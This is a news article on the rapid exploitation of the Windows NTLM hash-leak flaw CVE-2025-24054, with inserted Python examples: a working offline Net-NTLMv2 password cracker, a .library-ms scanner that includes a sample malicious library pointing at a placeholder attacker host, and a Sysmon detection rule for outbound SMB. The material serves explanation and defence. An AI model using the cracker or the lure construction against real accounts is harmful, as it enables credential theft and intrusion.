Bridging individuals with technology thru innovative solutions & delivery of excellence in  service.


Eight days from patch to exploitation for Microsoft flaw • The Register


April 21, 2025


On March 11 – Patch Tuesday – Microsoft rolled out its usual buffet of bug fixes. Just eight days later, miscreants had weaponized one of the vulnerabilities, using it against government and private sector targets in Poland and Romania.

The Windows flaw in question was CVE-2025-24054, an NTLM hash-leaking vulnerability that Microsoft rated as “less likely” to be exploited. Attackers begged to differ and built malware that abused the bug, according to researchers at Check Point.

Specifically, the vulnerability can be exploited to leak a victim's Net-NTLMv2 hash (also written NTLMv2-SSP) over the network. According to Check Point, miscreants can "attempt to brute-force the hash offline or perform relay attacks," and so impersonate the user to access resources and perform actions as them.
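To make the "brute-force the hash offline" part concrete, here is an added example (not code from the article or from Check Point) that runs a wordlist against a leaked Net-NTLMv2 response. The capture is constructed inside the script from a deliberately weak password so the whole thing runs offline; the user, domain, challenge and blob are all made up. What is real is the construction being attacked, per MS-NLMP: the NT hash is MD4 of the UTF-16LE password, the NTLMv2 key is HMAC-MD5 of that keyed over UPPER(user) + domain, and NTProofStr is HMAC-MD5 of the NTLMv2 key over server challenge || client blob. A listener on the attacker's SMB server gets the challenge, the blob and NTProofStr, which is everything the attack needs.

```python
"""Offline dictionary attack on a leaked Net-NTLMv2 response (added example, not from the article).

The "capture" below is constructed from a weak password so the script runs offline. The NTLMv2
construction itself follows MS-NLMP; the user, domain, challenge, blob and wordlist are assumptions.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

_M = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): hashlib's md4 is usually disabled under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)   # round-3 word order
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                         # round 1
            a, b, c, d = d, _rol((a + f(b, c, d) + x[i]) & _M, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                         # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rol((a + g(b, c, d) + x[k] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                         # round 3
            a, b, c, d = d, _rol((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & _M, (b0 + b) & _M, (c0 + c) & _M, (d0 + d) & _M
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what pass-the-hash needs and what the leak does NOT give."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16-byte value that hashcat mode 5600 cracks."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def crack(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes,
          wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate password that reproduces the captured NTProofStr, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, server_challenge, blob), proof):
            return candidate
    return None


def hashcat_line(user: str, domain: str, challenge: bytes, proof: bytes, blob: bytes) -> str:
    """Same layout an SMB capture tool would emit for hashcat -m 5600."""
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# --- Constructed capture (assumed values); a real blob is a full NTLMv2_CLIENT_CHALLENGE structure ---
USER, DOMAIN = "jdoe", "CORP"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "a1b2c3d4e5f60718" + "00" * 4 + "00" * 4 + "00" * 4)
CAPTURED_PROOF = nt_proof("Summer2025!", USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB)
WORDLIST = ["password", "Welcome1", "Spring2025!", "Summer2025!", "letmein"]

if __name__ == "__main__":
    print(hashcat_line(USER, DOMAIN, SERVER_CHALLENGE, CAPTURED_PROOF, CLIENT_BLOB))
    print("recovered:", crack(USER, DOMAIN, SERVER_CHALLENGE, CAPTURED_PROOF, CLIENT_BLOB, WORDLIST))
```

Two points worth keeping in mind when reading the quotes further down. First, the leaked value is challenge-bound: it can be relayed to another service while the exchange is live, or cracked offline as above, but it cannot be replayed the way an NT hash can in pass-the-hash; that needs the NT hash itself, which only cracking yields. Second, the crack cost is one HMAC-MD5 per candidate, which is why weak or reused passwords turn a "less likely" hash leak into a full account compromise.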

In the initial wave of attacks, phishing emails lured victims to download a Dropbox-hosted ZIP archive called xd.zip. Inside were four booby-trapped files, including a .library-ms file that exploited CVE-2025-24054. Simply unzipping the archive – or in some cases, just viewing the folder in Windows Explorer – was enough to trigger an outbound SMB authentication attempt, leaking the victim’s Net-NTLMv2 hash to a remote server controlled by the attackers.
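The trigger described above is a Windows Library file whose location list points at an attacker's host; Explorer resolves those locations when it displays the file, which is why viewing the folder is enough. The following added example (not code from the article or from Check Point) scans .library-ms XML for locations that would make the client authenticate to a host outside an allowlist. Both sample files are constructed; their layout follows Microsoft's published Library Description schema (namespace http://schemas.microsoft.com/windows/2009/library, one searchConnectorDescription/simpleLocation/url per aggregated folder). TRUSTED_HOSTS is an assumed list of an organisation's own file servers, and 203.0.113.5 is a documentation address, not a real indicator.

```python
"""Scan .library-ms files for locations that force an outbound SMB connection (added example).

The two library documents are constructed. The XML layout follows Microsoft's Library Description
schema; TRUSTED_HOSTS and the host names inside the samples are assumptions.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.example"}   # assumed corporate file servers
_UNC = re.compile(r"^\\\\([^\\]+)(?:\\|$)")                     # \\host\share...


def library_locations(xml_text: str) -> List[str]:
    """Every <url> under a simpleLocation, in document order."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iterfind(".//lib:simpleLocation/lib:url", NS) if u.text]


def remote_host(url: str) -> Optional[str]:
    """Host a location would be fetched from, or None for local paths and knownfolder: ids."""
    m = _UNC.match(url)
    if m:
        return m.group(1)
    if url.lower().startswith("file://"):
        host = url[len("file://"):].split("/", 1)[0]
        return host or None        # file:///C:/... has an empty authority, so it is local
    return None


def suspicious_locations(xml_text: str) -> List[str]:
    """Locations that would make Explorer authenticate to a host outside the allowlist."""
    out = []
    for url in library_locations(xml_text):
        host = remote_host(url)
        if host and host.lower() not in TRUSTED_HOSTS:
            out.append(url)
    return out


# Constructed samples: a Documents-style library, and one carrying an attacker-style UNC path.
BENIGN_LIBRARY = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\fileserver01\projects</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

MALICIOUS_LIBRARY = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\203.0.113.5\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_LIBRARY), ("malicious", MALICIOUS_LIBRARY)):
        print(label, suspicious_locations(doc))
```

Run this over mail-gateway attachments, including the contents of ZIP archives, and over users' Downloads folders; a .library-ms file arriving by e-mail has no legitimate reason to point at a host you do not operate. Because the connection is plain SMB, blocking outbound TCP/445 at the network edge stops the leak regardless of which file type triggers it.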

The Check Point researchers observed that stolen NTLM hashes were exfiltrated to a specific IP address: 159.196.128[.]120 – an address previously flagged by HarfangLab in January as linked to APT28, aka the Russia-backed Fancy Bear hacking group. However, there’s no further information directly associating this IP with the group, the security shop notes.

By March 25, attackers were no longer relying solely on ZIP archives and had begun emailing standalone .library-ms files directly to targets. According to Microsoft, the exploit can be triggered with minimal user interaction, such as selecting (single-clicking) or inspecting (right-clicking) the file.

The campaign quickly went international, with around 10 separate campaigns observed by March 25, all aimed at harvesting NTLMv2 hashes. The stolen credentials were sent to attacker-controlled SMB servers located in Russia, Bulgaria, the Netherlands, Australia, and Turkey.
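Whatever the lure, the observable on the victim side is the same: Explorer (or the indexer acting on its behalf) opening an SMB session to an address the organisation does not own. The following added example (not from the article) applies that logic to Sysmon Event ID 3 network-connection records. The event lines are constructed and flattened to "|"-separated key=value pairs; the field names (EventID, Image, Initiated, Protocol, DestinationIp, DestinationPort) are Sysmon's own. INTERNAL_NETS and WATCHED_IMAGES are assumptions for an organisation whose file servers live in RFC 1918 space.

```python
"""Flag outbound SMB from Explorer to non-internal hosts in Sysmon Event ID 3 records (added example).

The sample events are constructed; INTERNAL_NETS and WATCHED_IMAGES are assumed for the environment.
"""
import ipaddress
from typing import Dict, List, Optional

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10")]
# Processes that resolve library locations when a .library-ms file is displayed or indexed (assumed set).
WATCHED_IMAGES = {r"c:\windows\explorer.exe", r"c:\windows\system32\searchprotocolhost.exe"}


def parse_record(line: str) -> Dict[str, str]:
    """key=value|key=value -> dict (the flattened form used for the constructed sample)."""
    return dict(kv.split("=", 1) for kv in line.split("|") if "=" in kv)


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_hash_leak_candidate(rec: Dict[str, str]) -> bool:
    """Outbound TCP/445 initiated by a watched process to an address we do not own."""
    if rec.get("EventID") != "3" or rec.get("Initiated", "").lower() != "true":
        return False
    if rec.get("Protocol", "").lower() != "tcp" or rec.get("DestinationPort") != "445":
        return False
    if rec.get("Image", "").lower() not in WATCHED_IMAGES:
        return False
    dst: Optional[str] = rec.get("DestinationIp")
    return bool(dst) and not is_internal(dst)


def find_hash_leak_candidates(lines: List[str]) -> List[Dict[str, str]]:
    return [r for r in map(parse_record, lines) if is_hash_leak_candidate(r)]


# Constructed events (203.0.113.0/24 is a documentation range, not a real indicator).
SAMPLE_EVENTS = [
    r"EventID=3|Image=C:\Windows\explorer.exe|User=CORP\jdoe|Protocol=tcp|Initiated=true|DestinationIp=203.0.113.5|DestinationPort=445",
    r"EventID=3|Image=C:\Windows\explorer.exe|User=CORP\jdoe|Protocol=tcp|Initiated=true|DestinationIp=10.20.1.15|DestinationPort=445",
    r"EventID=3|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|User=CORP\jdoe|Protocol=tcp|Initiated=true|DestinationIp=203.0.113.9|DestinationPort=443",
    r"EventID=3|Image=C:\Windows\explorer.exe|User=CORP\jdoe|Protocol=tcp|Initiated=false|DestinationIp=203.0.113.5|DestinationPort=445",
    r"EventID=1|Image=C:\Windows\explorer.exe|User=CORP\jdoe|CommandLine=explorer.exe",
]

if __name__ == "__main__":
    for rec in find_hash_leak_candidates(SAMPLE_EVENTS):
        print(f"possible NTLM leak: {rec['User']} via {rec['Image']} -> {rec['DestinationIp']}:445")
```

The Initiated=true check matters: an inbound SMB connection to the workstation is not this attack. If outbound TCP/445 is already blocked at the perimeter, widen WATCHED_IMAGES to every process, since any attempt is then worth a ticket; conversely, in environments with internet-exposed file shares, the allowlist of internal ranges needs those hosts added or the rule will be noisy.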

“This rapid exploitation highlights the critical need for organizations to apply patches immediately and ensure that NTLM vulnerabilities are addressed in their environments,” Check Point reported.

“The minimal user interaction required for the exploit to trigger and the ease with which attackers can gain access to NTLM hashes make it a significant threat, especially when such hashes can be used in pass-the-hash attacks.”


